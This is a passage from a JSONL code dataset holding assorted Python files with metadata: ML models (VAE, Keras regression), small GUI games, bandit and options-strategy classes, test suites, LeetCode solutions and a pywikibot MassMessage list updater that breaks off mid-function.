[paddle_x, paddle_y, paddle_width, paddle_height], 0)\n #update the entire display\n pygame.display.update()\n\n\npygame.quit()\n","sub_path":"Day-6/finished/bounce game.py","file_name":"bounce game.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590234750","text":"import torch\nfrom torch import nn\n\ndevice = torch.device(\"cuda:0\")\n\nclass NegativeELBO(nn.Module):\n\n def __init__(self):\n super(NegativeELBO,self).__init__()\n\n def forward(self,x,x_hat,mean,log_variance):\n\n divergence = - (1+ log_variance - mean**2 - log_variance.exp()).sum()/2\n reconstruction_error = ((x-x_hat)**2).sum()\n\n return divergence + reconstruction_error\n\nclass Encoder(nn.Module):\n\n def __init__(self,inp_dim=784,z_dim=32):\n super(Encoder,self).__init__()\n self.relu = nn.ReLU()\n \n self.layer1 = nn.Linear(inp_dim,256)\n self.layer2 = nn.Linear(256,144)\n\n self.mean = nn.Linear(144,32)\n self.log_variance = nn.Linear(144,32)\n\n def forward(self,x):\n\n x = self.relu(self.layer1(x))\n x = self.relu(self.layer2(x))\n\n mean = self.mean(x)\n log_var = self.log_variance(x)\n\n return mean,log_var\n\nclass Decoder(nn.Module):\n\n def __init__(self,out_dim=784,z_dim=32):\n super(Decoder,self).__init__()\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n \n self.layer1 = nn.Linear(z_dim,144)\n self.layer2 = nn.Linear(144,256)\n self.layer3 = nn.Linear(256,out_dim)\n\n def forward(self,x):\n\n x = self.relu(self.layer1(x))\n x = self.relu(self.layer2(x))\n x = self.sigmoid(self.layer3(x))\n\n return x\n\n\nclass VAE(nn.Module):\n\n def __init__(self,inp_dim=784,z_dim=32):\n super(VAE,self).__init__()\n\n self.encoder = Encoder(inp_dim=inp_dim,z_dim=z_dim)\n self.decoder = Decoder(out_dim=inp_dim,z_dim=z_dim)\n\n def reparameterize(self,mean,log_variance):\n\n deviation = torch.exp(log_variance/2)\n eta = torch.randn(deviation.shape,\n device=deviation.device,\n layout=deviation.layout,\n dtype=deviation.dtype\n ) \n\n z = mean + deviation*eta\n return z\n\n def forward(self,x):\n mean,log_variance = self.encoder(x)\n z = self.reparameterize(mean,log_variance)\n self.z_dim = z.shape\n out = self.decoder(z)\n return out,mean,log_variance\n\n def generate(self,count=1,device=device):\n random = torch.randn(self.z_dim)\n image = self.decoder(random)\n return 
image\n","sub_path":"models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"562606370","text":"##image movement\nfrom tkinter import *\n\ntk = Tk()\ncont=170\ncanvas = Canvas(tk, width=800, height=300)\ncanvas.pack()\nmy_image2 = PhotoImage(file=\"arco.gif\")\ncanvas.create_image(0,0,anchor=NW, image=my_image2)\nmy_image = PhotoImage(file=\"balon.gif\")\ncanvas.create_image(550,0,anchor=NW, image=my_image)\n\ndef moveimage(event):\n    global cont \n    if event.keysym == 'Left':\n        canvas.move(2, -2, 0)\n        cont =cont-1\n        print (cont)\n        if cont ==0:\n            print (\"gol\")\n            b1=Button(canvas,text=\"GOL\") # First button\n            b1.pack()\n    else:\n        canvas.move(2, 2, 0)\n        \ncanvas.bind_all('<KeyPress-Left>', moveimage)\ncanvas.bind_all('<KeyPress-Right>', moveimage)\ntk.mainloop()\n\n","sub_path":"Prueba_gol/prueba_gol.py","file_name":"prueba_gol.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"77144482","text":"# Copyright (c) Yuta Saito, Yusuke Narita, and ZOZO Technologies, Inc. All rights reserved.\n# Licensed under the Apache 2.0 License.\n\n\"\"\"Base Interfaces for Bandit Algorithms.\"\"\"\nfrom abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nimport numpy as np\nfrom sklearn.base import clone, ClassifierMixin, is_classifier\nfrom sklearn.utils import check_random_state\n\nfrom ..utils import check_bandit_feedback_inputs\n\n\n@dataclass\nclass BaseContextFreePolicy(metaclass=ABCMeta):\n    \"\"\"Base class for context-free bandit policies.\n\n    Parameters\n    ----------\n    n_actions: int\n        Number of actions.\n\n    len_list: int, default: 1\n        Length of a list of recommended actions in each impression.\n        When Open Bandit Dataset is used, 3 should be set.\n\n    batch_size: int, default: 1\n        Number of samples used in a batch parameter update.\n\n    random_state: int, default: None\n        Controls the random seed in sampling actions.\n\n    \"\"\"\n\n    n_actions: int\n    len_list: int = 1\n    batch_size: int = 1\n    random_state: Optional[int] = None\n\n    def __post_init__(self) -> None:\n        \"\"\"Initialize Class.\"\"\"\n        assert self.n_actions > 1 and isinstance(\n            self.n_actions, int\n        ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n        assert self.len_list > 0 and isinstance(\n            self.len_list, int\n        ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n        assert self.batch_size > 0 and isinstance(\n            self.batch_size, int\n        ), f\"batch_size must be a positive integer, but {self.batch_size} is given\"\n\n        self.n_trial = 0\n        self.random_ = check_random_state(self.random_state)\n        self.action_counts = np.zeros(self.n_actions, dtype=int)\n        self.action_counts_temp = np.zeros(self.n_actions, dtype=int)\n        self.reward_counts_temp = np.zeros(self.n_actions)\n        self.reward_counts = np.zeros(self.n_actions)\n\n    @property\n    def policy_type(self) -> str:\n        \"\"\"Type of the bandit policy.\"\"\"\n        return \"contextfree\"\n\n    def initialize(self) -> None:\n        \"\"\"Initialize Parameters.\"\"\"\n        self.n_trial = 0\n        self.random_ = check_random_state(self.random_state)\n        self.action_counts = np.zeros(self.n_actions, dtype=int)\n        self.action_counts_temp = np.zeros(self.n_actions, dtype=int)\n        self.reward_counts_temp = np.zeros(self.n_actions)\n        self.reward_counts = np.zeros(self.n_actions)\n\n    @abstractmethod\n    def 
select_action(self) -> np.ndarray:\n \"\"\"Select a list of actions.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_params(self, action: int, reward: float) -> None:\n \"\"\"Update policy parameters.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\nclass BaseContextualPolicy(metaclass=ABCMeta):\n \"\"\"Base class for contextual bandit policies.\n\n Parameters\n ----------\n dim: int\n Number of dimensions of context vectors.\n\n n_actions: int\n Number of actions.\n\n len_list: int, default: 1\n Length of a list of recommended actions in each impression.\n When Open Bandit Dataset is used, 3 should be set.\n\n batch_size: int, default: 1\n Number of samples used in a batch parameter update.\n\n alpha_: float, default: 1.\n Prior parameter for the online logistic regression.\n\n lambda_: float, default: 1.\n Regularization hyperparameter for the online logistic regression.\n\n random_state: int, default: None\n Controls the random seed in sampling actions.\n\n \"\"\"\n\n dim: int\n n_actions: int\n len_list: int = 1\n batch_size: int = 1\n alpha_: float = 1.0\n lambda_: float = 1.0\n random_state: Optional[int] = None\n\n def __post_init__(self) -> None:\n \"\"\"Initialize class.\"\"\"\n assert self.dim > 0 and isinstance(\n self.dim, int\n ), f\"dim must be a positive integer, but {self.dim} is given\"\n assert self.n_actions > 1 and isinstance(\n self.n_actions, int\n ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n assert self.len_list > 0 and isinstance(\n self.len_list, int\n ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n assert self.batch_size > 0 and isinstance(\n self.batch_size, int\n ), f\"batch_size must be a positive integer, but {self.batch_size} is given\"\n\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.alpha_list = self.alpha_ * np.ones(self.n_actions)\n self.lambda_list = self.lambda_ * np.ones(self.n_actions)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.reward_lists = [[] for _ in np.arange(self.n_actions)]\n self.context_lists = [[] for _ in np.arange(self.n_actions)]\n\n @property\n def policy_type(self) -> str:\n \"\"\"Type of the bandit policy.\"\"\"\n return \"contextual\"\n\n def initialize(self) -> None:\n \"\"\"Initialize policy parameters.\"\"\"\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.reward_lists = [[] for _ in np.arange(self.n_actions)]\n self.context_lists = [[] for _ in np.arange(self.n_actions)]\n\n @abstractmethod\n def select_action(self, context: np.ndarray) -> np.ndarray:\n \"\"\"Select a list of actions.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_params(self, action: float, reward: float, context: np.ndarray) -> None:\n \"\"\"Update policy parameters.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\nclass BaseOffPolicyLearner(metaclass=ABCMeta):\n \"\"\"Base Class for off-policy learner with OPE estimators.\n\n Parameters\n -----------\n base_model: ClassifierMixin\n Machine learning classifier to be used to train an offline decision making policy.\n\n n_actions: int\n Number of actions.\n\n len_list: int, default: 1\n Length of a list of recommended actions in each impression.\n When Open Bandit Dataset is used, 3 should be set.\n\n Reference\n -----------\n Miroslav Dudík, Dumitru Erhan, John Langford, and Lihong Li.\n \"Doubly Robust Policy Evaluation and Optimization.\", 2014.\n\n 
\"\"\"\n\n base_model: ClassifierMixin\n n_actions: int\n len_list: int = 1\n\n def __post_init__(self) -> None:\n \"\"\"Initialize class.\"\"\"\n assert is_classifier(self.base_model), \"base_model must be a classifier.\"\n assert self.n_actions > 1 and isinstance(\n self.n_actions, int\n ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n assert self.len_list > 0 and isinstance(\n self.len_list, int\n ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n self.base_model_list = [\n clone(self.base_model) for _ in np.arange(self.len_list)\n ]\n\n @property\n def policy_type(self) -> str:\n \"\"\"Type of the bandit policy.\"\"\"\n return \"offline\"\n\n @abstractmethod\n def _create_train_data_for_opl(\n self,\n context: np.ndarray,\n action: np.ndarray,\n reward: np.ndarray,\n pscore: Optional[np.ndarray] = None,\n ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Create training data for off-policy learning.\n\n Parameters\n -----------\n context: array-like, shape (n_actions,)\n Context vectors in the given training logged bandit feedback.\n\n action: array-like, shape (n_actions,)\n Selected actions by behavior policy in the given training logged bandit feedback.\n\n reward: array-like, shape (n_actions,)\n Observed rewards in the given training logged bandit feedback.\n\n pscore: Optional[np.ndarray], default: None\n Propensity scores, the probability of selecting each action by behavior policy,\n in the given training logged bandit feedback.\n\n Returns\n --------\n (X, sample_weight, y): Tuple[np.ndarray, np.ndarray, np.ndarray]\n Feature vectors, sample weights, and outcome for training the base machine learning model.\n\n \"\"\"\n raise NotImplementedError\n\n def fit(\n self,\n context: np.ndarray,\n action: np.ndarray,\n reward: np.ndarray,\n pscore: Optional[np.ndarray] = None,\n position: Optional[np.ndarray] = None,\n ) -> None:\n \"\"\"Fits the offline bandit policy according to the given logged bandit feedback data.\n\n Parameters\n -----------\n context: array-like, shape (n_rounds, dim_context)\n Context vectors in the given training logged bandit feedback.\n\n action: array-like, shape (n_rounds,)\n Selected actions by behavior policy in the given training logged bandit feedback.\n\n reward: array-like, shape (n_rounds,)\n Observed rewards in the given training logged bandit feedback.\n\n pscore: array-like, shape (n_rounds,), default: None\n Propensity scores, the probability of selecting each action by behavior policy,\n in the given training logged bandit feedback.\n\n position: array-like, shape (n_rounds,), default=None\n Positions of each round in the given training logged bandit feedback.\n If None is given, a learner assumes that there is only one position.\n When `len_list` > 1, position has to be set.\n\n \"\"\"\n check_bandit_feedback_inputs(\n context=context,\n action=action,\n reward=reward,\n pscore=pscore,\n position=position,\n )\n if pscore is None:\n n_actions = np.int(action.max() + 1)\n pscore = np.ones_like(action) / n_actions\n if position is None:\n assert self.len_list == 1, \"position has to be set when len_list is 1\"\n position = np.zeros_like(action)\n for position_ in np.arange(self.len_list):\n X, sample_weight, y = self._create_train_data_for_opl(\n context=context[position == position_],\n action=action[position == position_],\n reward=reward[position == position_],\n pscore=pscore[position == position_],\n )\n self.base_model_list[position_].fit(X=X, y=y, 
+{"seq_id":"149582981","text":"# keras regression\nimport numpy as np \nnp.random.seed(1337)\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport matplotlib.pyplot as plt\n\n# create data #\nX = np.linspace(-3,3,100)\nnp.random.shuffle(X)\nY = 0.5 * X + 2 + np.random.normal(0,0.05,(100,))\nsize = len(X)\n\n\n# split into train/test\nX_train, X_test = X[:int(size*0.8)], X[int(size*0.8):]\nY_train, Y_test = Y[:int(size*0.8)], Y[int(size*0.8):]\n\n# build neural network \nmodel = Sequential()\nmodel.add(Dense(input_dim=1,output_dim=1))\n\n# define your own loss function\ndef my_own_loss_function(y_true, y_pred):\n\t# mean absolute error\n\tcce = np.abs(y_true-y_pred)\n\treturn cce\n\n# choose loss function and optimizer\nmodel.compile(loss=my_own_loss_function, optimizer='adam')\n\n\n#training\nprint('Training -------')\nfor step in range(3001):\n\tcost = model.train_on_batch(X_train, Y_train)\n\tif step % 100 == 0:\n\t\tprint('train cost : ', cost)\n\nprint('Testing -------')\ncost = model.evaluate(X_test, Y_test, batch_size=int(size*0.2))\nprint('Test cost:', cost)\n\nW, b = model.layers[0].get_weights()\nprint('Weights=',W,'\\nbiases=',b)\n\nY_pred = model.predict(X_test)\n\nplt.scatter(X_test, 
Y_test)\nplt.plot(X_test,Y_pred)\nplt.show()","sub_path":"keras_regressionXY.py","file_name":"keras_regressionXY.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"154340656","text":"import string\n\n# print(string.ascii_lowercase)\n\n# print(string.ascii_uppercase)\n\n# print(string.punctuation)\n\n\n\n# ciph['newkey'] = 'newvalue'\n\n\n# def ciph(i):\n# # for i in string.ascii_lowercase:\n# ikey = i\n# ival_id = string.ascii_lowercase.index(i)\n# ival = string.ascii_lowercase[(ival_id + 2) % 26]\n# print(ikey)\n# print(ival_id)\n# print(ival)\n\nmessage = 'a, c'\n\nclass Message(object):\n\n def build(self, shift):\n self.ciph = {}\n for letter in string.ascii_lowercase:\n ival_id = string.ascii_lowercase.index(letter)\n ival = string.ascii_lowercase[(ival_id + shift) % 26]\n self.ciph[letter] = ival\n\n for letter in string.ascii_uppercase:\n jval_id = string.ascii_uppercase.index(letter)\n jval = string.ascii_uppercase[(jval_id + shift) % 26]\n self.ciph[letter] = jval\n return self.ciph\n\n\n\n def apply(self, shift):\n inst = Message()\n ciph = inst.build(shift)\n new = []\n for letter in message:\n if letter in ciph:\n # self.ciph: \n x = ciph.get(letter)\n new.append(x)\n else:\n new.append(letter)\n return ''.join(new)\n\n\ninst2 = Message()\nprint(inst2.apply(2))\n\n# inst = Message()\n# print(inst.build(2))\n# print(inst.apply('a, c'))\n\n# have to call instance of build method in apply apply method \n# run without print(inst.build(2)) to check what happens\n# convert the result into a string.\n\n\n","sub_path":"Problems/wk6/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"622193796","text":"import logging\nimport os\nimport traceback\nimport tempfile\nfrom base_test_case import BaseTestCase\nfrom pbinternal2.analysis.yield_plots import run_yield_plots, run_alignment_yield_plot\nfrom pbinternal2.models import AnalysisConditions\nfrom matplotlib.figure import Figure as fig\nfrom pbinternal2.util.range import Range, Ranges, OverlappingRanges\nfrom base_test_case import get_temp_file, get_pkg_data_file\n\nlog = logging.getLogger(__name__)\n\nclass TestYieldPlots(BaseTestCase):\n \"\"\"Unit and integration tests for analysis yield_plots\"\"\"\n\n def setUp(self):\n \"\"\"\n Before *every* test\n \"\"\"\n try:\n BaseTestCase.setUp(self)\n except Exception as err:\n log.error(err)\n tb = traceback.format_exc()\n log.error(tb)\n raise\n log.debug(\"In setUp()\")\n self.output = tempfile.mkdtemp(suffix=\"yield_plots\")\n\n def tearDown(self):\n \"\"\"\n After *every* test\n \"\"\"\n try:\n BaseTestCase.tearDown(self)\n except Exception as err:\n log.error(err)\n tb = traceback.format_exc()\n log.error(tb)\n raise\n def test_run_e2e_yield_plots(self):\n conditions = get_pkg_data_file(\"conditions_hello_world.json\")\n output = os.path.join(self.output, \"yield_plot_report.json\")\n rcode = run_yield_plots(conditions, output)\n self.assertIs(rcode, 0)\n\n def test_yield_plots(self):\n conditions = get_pkg_data_file(\"conditions_hello_world.json\")\n c = AnalysisConditions.load_conditions_from(conditions)\n figure = run_alignment_yield_plot(c)\n self.assertIsInstance(type(figure), 
type(fig))","sub_path":"tests/test_pbinternal2_analysis_yield_plots.py","file_name":"test_pbinternal2_analysis_yield_plots.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208302558","text":"class Solution:\n def subarraysWithKDistinct(self, nums: List[int], k: int) -> int:\n visited = {}\n window = deque([])\n unique = ans = 0\n left = -1\n for i, num in enumerate(nums):\n if num not in visited:\n unique += 1\n window.append((num, i))\n visited[num] = i\n while window and window[0][1] != visited[window[0][0]]:\n window.popleft()\n if unique > k:\n remove, left = window.popleft()\n visited.pop(remove)\n unique -= 1\n while window and window[0][1] != visited[window[0][0]]:\n window.popleft()\n if unique == k:\n ans += window[0][1]-left\n return ans\n\nclass Solution:\n def subarraysWithKDistinct(self, A, K):\n return self.atMostK(A, K) - self.atMostK(A, K - 1)\n\n def atMostK(self, A, K):\n count = Counter()\n res = i = 0\n for j in range(len(A)):\n if count[A[j]] == 0: K -= 1\n count[A[j]] += 1\n while K < 0:\n count[A[i]] -= 1\n if count[A[i]] == 0: K += 1\n i += 1\n res += j - i + 1\n return res\n ","sub_path":"992. Subarrays with K Different Integers.py","file_name":"992. Subarrays with K Different Integers.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20816891","text":"class EmptyFileError(Exception):\n pass\n\nmy_file=open(\"myfile1\",\"w+\")\nfor i in range(11):\n my_file.write(str(i)+\" \")\nmy_file.close()\n\nfilenames=[\"myfile1\",\"nonExistent\",\"emptyFile\",\"myfile2\"]\nfor file in filenames:\n try:\n f=open(file,'r')\n linea=f.readline()\n if linea==\"\":\n f.close()\n raise EmptyFileError(\"%s: is empty\"%file)\n except IOError as error:\n print(\"%s: could not be opened: %s\"%(file,error.strerror))\n except EmptyFileError as error:\n print(error)\n else: #Se ejecuta si no pasa por excepts\n print(\"%s: %s\"%(file,linea))\n finally: #Se ejecuta siempre\n print(\"Done processing\",file)\n \n","sub_path":"PYTHON/PythonManning/PythonManningBook/intro/Excepciones.py","file_name":"Excepciones.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"298811026","text":"from typing import Any, Dict\n\nimport pytest\nimport requests\n\nfrom schemathesis import models\nfrom schemathesis.runner.checks import content_type_conformance, response_schema_conformance\nfrom schemathesis.schemas import BaseSchema\n\n\ndef make_test_result(schema: BaseSchema, definition: Dict[str, Any]) -> models.TestResult:\n endpoint = models.Endpoint(\"/path\", \"GET\", definition=definition)\n return models.TestResult(endpoint, schema)\n\n\ndef make_response(content=b\"{}\", content_type=\"application/json\") -> requests.Response:\n response = requests.Response()\n response._content = content\n response.status_code = 200\n response.headers[\"Content-Type\"] = content_type\n return response\n\n\n@pytest.fixture()\ndef response(request):\n return make_response(content_type=request.param)\n\n\n@pytest.fixture()\ndef results(request, swagger_20) -> models.TestResult:\n return make_test_result(swagger_20, {\"produces\": request.param})\n\n\n@pytest.mark.parametrize(\n \"response, results\",\n (\n (\"application/json\", []),\n (\"application/json\", [\"application/json\"]),\n (\"application/json;charset=utf-8\", 
[\"application/json\"]),\n ),\n indirect=[\"response\", \"results\"],\n)\ndef test_content_type_conformance_valid(response, results):\n assert content_type_conformance(response, results) is None\n\n\n@pytest.mark.parametrize(\n \"response, results\",\n ((\"plain/text\", [\"application/json\"]), (\"plain/text;charset=utf-8\", [\"application/json\"])),\n indirect=[\"response\", \"results\"],\n)\ndef test_content_type_conformance_invalid(response, results):\n message = (\n f\"^Received a response with '{response.headers['Content-Type']}' Content-Type, \"\n \"but it is not declared in the schema.\\n\\nDefined content types: application/json$\"\n )\n with pytest.raises(AssertionError, match=message):\n content_type_conformance(response, results)\n\n\nSUCCESS_SCHEMA = {\"type\": \"object\", \"properties\": {\"success\": {\"type\": \"boolean\"}}, \"required\": [\"success\"]}\n\n\n@pytest.mark.parametrize(\n \"content, definition\",\n (\n (b'{\"success\": true}', {}),\n (b'{\"success\": true}', {\"responses\": {\"200\": {\"description\": \"text\"}}}),\n (b'{\"random\": \"text\"}', {\"responses\": {\"200\": {\"description\": \"text\"}}}),\n (b'{\"success\": true}', {\"responses\": {\"200\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n (b'{\"success\": true}', {\"responses\": {\"default\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n ),\n)\ndef test_response_schema_conformance(swagger_20, content, definition):\n response = make_response(content)\n results = make_test_result(swagger_20, definition)\n assert response_schema_conformance(response, results) is None\n\n\n@pytest.mark.parametrize(\n \"content, definition\",\n (\n (b'{\"random\": \"text\"}', {\"responses\": {\"200\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n (b'{\"random\": \"text\"}', {\"responses\": {\"default\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n ),\n)\ndef test_response_schema_conformance_invalid(swagger_20, content, definition):\n response = make_response(content)\n results = make_test_result(swagger_20, definition)\n with pytest.raises(AssertionError):\n response_schema_conformance(response, results)\n","sub_path":"test/runner/test_checks.py","file_name":"test_checks.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"628385255","text":"import numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score\nfrom nnclassifier import NNClassifier\n\n\n# This function splits the dataset into 3 sets (training set, cross-validation\n# set and test set), altough the third one is not actually used here\ndef splitdata(X, y):\n m = X.shape[0]\n b1 = int(m*0.6)\n b2 = int(m*0.8)\n return X[:b1, :], y[:b1], X[b1:b2, :], y[b1:b2], X[b2:, :], y[b2:]\n\n\n# Loading a file with data\ndata = loadmat('ex4data1.mat')\ndata_matrix = np.c_[data['X'], data['y']]\nnp.random.shuffle(data_matrix)\nX_ = data_matrix[:, :-1]\ny_ = np.array(data_matrix[:, -1], dtype=np.int)\n\nXtrain, ytrain, Xcv, ycv, Xtest, ytest = splitdata(X_, y_)\n\n# Creates a neural net with 25 units in the first hidden layer and 10 in the\n# second\nnn = NNClassifier(hidden_layer_sizes=[25, 10], penalty_const=1.5,\n learning_rate=2, max_iter=500)\n\n# See fit doc strings to learn how to use it.\nnn.fit(Xtrain, ytrain)\n\n# See predict doc strings to learn how to use it.\ny_pred = nn.predict(Xtrain)\nscore = accuracy_score(y_true=ytrain, y_pred=y_pred)\nprint('Accuracy (training): ', 
score)\n\ny_pred = nn.predict(Xcv)\nscore = accuracy_score(y_true=ycv, y_pred=y_pred)\nprint('Accuracy (cross-validation): ', score)\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"470941741","text":"from .option_query import *\nfrom abc import ABC\n\nclass OptionStrategy(ABC):\n \"\"\"\n This class represents a option spread object\n \"\"\"\n\n def __init__(self, name=None):\n self.name = name\n self.cols = ['symbol',\n 'expiration',\n 'quote_date',\n 'bid',\n 'ask',\n 'mark',\n 'delta',\n 'gamma',\n 'theta',\n 'vega',\n 'rho'\n ]\n\n\nclass Single(OptionStrategy):\n \"\"\"\n This class simulates a single option position. Either a call or put of an underlying asset\n \"\"\"\n\n def __init__(self, **params):\n super(Single, self).__init__('Single')\n self.option_type = params.pop('option_type', 'c')\n\n def __call__(self, data):\n # get spread params from user or set default if not given\n chains = OptionQuery(data).option_type(self.option_type).fetch()\n chains['mark'] = (chains['bid'] + chains['ask']) / 2\n chains = chains.set_index('quote_date', drop=False)\n\n return chains.loc[:, chains.columns.isin(self.cols)]\n\n\nclass Vertical(OptionStrategy):\n \"\"\"\n The vertical spread is an option spread strategy whereby the\n option trader purchases a certain number of options and simultaneously\n sell an equal number of options of the same class, same underlying security,\n same expiration date, but at a different strike price.\n \"\"\"\n\n def __init__(self, **params):\n super(Vertical, self).__init__('Vertical')\n\n # get spread params from user or set default if not given\n self.option_type = params.pop('option_type', 'c')\n self.width = params.pop('width', 2)\n\n if not self.width > 0:\n raise ValueError(\"Width cannot be less than 0\")\n\n def __call__(self, data):\n # here we get all the option chains based on option type\n chains = OptionQuery(data).option_type(self.option_type).fetch()\n\n # shift only the strikes since this is a vertical spread,\n # we create a join key (strike_key) to join on\n chains['strike_key'] = chains['strike'] + (self.width * self.option_type.value[1])\n left_keys = ['quote_date', 'expiration', 'option_type', 'strike_key']\n right_keys = ['quote_date', 'expiration', 'option_type', 'strike']\n\n # here we do a self join to the table itself joining by strike key, essentially we are\n # shifting the strikes to create the vertical spread\n chains = chains.merge(chains, left_on=left_keys, right_on=right_keys,\n suffixes=('', '_shifted'))\n\n # create the strategy symbol that represents this spread\n chains['symbol'] = chains['symbol'] + '-' + chains['symbol_shifted']\n\n # Calculate the spread's bid and ask prices and\n chains['bid'] = chains['bid'] - chains['ask_shifted']\n chains['ask'] = chains['ask'] - chains['bid_shifted']\n chains['mark'] = round((chains['bid'] + chains['ask']) / 2, 2)\n\n for greek in ['delta', 'theta', 'gamma', 'vega', 'rho']:\n if greek in chains.columns:\n chains[greek] = chains[greek] - chains[greek + \"_shifted\"]\n\n chains = chains.set_index('quote_date', drop=False)\n return chains.loc[:, chains.columns.isin(self.cols)]\n\n\nclass IronCondor(OptionStrategy):\n \"\"\"\n The iron condor is an option trading strategy utilizing two vertical spreads\n a put spread and a call spread with the same expiration and four different strikes.\n \"\"\"\n\n def __init__(self, option_type, width, 
c_width, p_width):\n super(IronCondor, self).__init__('Iron Condor')\n self.option_type = option_type\n self.width = width\n self.c_width = c_width\n self.p_width = p_width\n\n def __call__(self, data):\n\n if self.width <= 0 or self.c_width <= 0 or self.p_width <= 0:\n raise ValueError(\"Widths cannot be less than or equal 0\")\n\n\nclass CoveredStock(OptionStrategy):\n\n def __init__(self, data):\n super(CoveredStock, self).__init__(data)\n\n def __call__(self, data):\n pass\n\n\nclass Calender(OptionStrategy):\n\n def __init__(self, data, width):\n super(Calender, self).__init__(data)\n self.width = width\n\n def __call__(self, data):\n pass\n\n\nclass Butterfly(OptionStrategy):\n\n def __init__(self, data, width):\n super(Butterfly, self).__init__(data)\n self.width = width\n\n\nclass Diagonal(OptionStrategy):\n\n def __init__(self, data, width):\n super(Diagonal, self).__init__(data)\n self.width = width\n\n","sub_path":"optopsy/option_strategy.py","file_name":"option_strategy.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373318690","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script updates user groups MassMessage lists.\n\nThe following parameters are required:\n\n-config The page title that has the JSON config (object)\n\nThe following parameters are supported:\n\n-always Don't prompt to save changes.\n\n-end_date Logs will be parsed starting on this date. The default is\n yesterday. Format: YYYY-MM-DD.\n\n-meta metawiki will also be checked for group changes. Should be\n specified when running on WMF wikis with CentralAuth.\n\n-rename Rename logs will be parsed. If -meta from metawiki.\n\n-start_date Logs will be parsed ending on this date. The default is\n yesterday. 
Format: YYYY-MM-DD.\n\"\"\"\n# Author : JJMC89\n# License: MIT\nimport datetime\nimport json\nimport re\nfrom collections import OrderedDict\nfrom datetime import date, time, timedelta\nfrom itertools import chain\nfrom operator import itemgetter\n\nimport pywikibot\nfrom pywikibot.bot import ExistingPageBot, NoRedirectPageBot, SingleSiteBot\nfrom pywikibot.pagegenerators import PreloadingGenerator\n\n\ndef get_json_from_page(page):\n \"\"\"\n Return JSON from the page.\n\n @param page: Page to read\n @type page: L{pywikibot.Page}\n\n @rtype: dict or None\n \"\"\"\n if not page.exists():\n pywikibot.error('{} does not exist.'.format(page.title()))\n return None\n if page.isRedirectPage():\n pywikibot.error('{} is a redirect.'.format(page.title()))\n return None\n if page.isEmpty():\n pywikibot.log('{} is empty.'.format(page.title()))\n return None\n try:\n return json.loads(page.get().strip())\n except ValueError:\n pywikibot.error('{} does not contain valid JSON.'.format(page.title()))\n raise\n\n\ndef validate_config(config, site):\n \"\"\"\n Validate the configuration and return bool.\n\n @param config: configuration to validate\n @type config: dict\n @param site: site used in the validation\n @type site: L{pywikibot.Site}\n\n @rtype: bool\n \"\"\"\n pywikibot.log('config:')\n if not isinstance(config, dict):\n return False\n for title, page_config in config.items():\n pywikibot.log('-{} = {}'.format(title, page_config))\n page_config['page'] = pywikibot.Page(site, title)\n required_keys = ['enabled', 'group', 'page']\n has_keys = list()\n for key, value in page_config.items():\n if key in required_keys:\n has_keys.append(key)\n if key in ('add', 'enabled', 'remove', 'required'):\n if not isinstance(value, bool):\n return False\n elif key == 'group':\n if isinstance(value, str):\n page_config[key] = set([value])\n else:\n return False\n elif key == 'page':\n if value.content_model != 'MassMessageListContent':\n return False\n else:\n return False\n if sorted(has_keys) != sorted(required_keys):\n return False\n return True\n\n\ndef validate_options(options):\n \"\"\"\n Validate the options and return bool.\n\n @param options: options to validate\n @type options: dict\n\n @rtype: bool\n \"\"\"\n pywikibot.log('Options:')\n required_keys = ['config', 'end_date', 'start_date']\n has_keys = list()\n for key in ('end_date', 'start_date'):\n if key not in options:\n continue\n value = 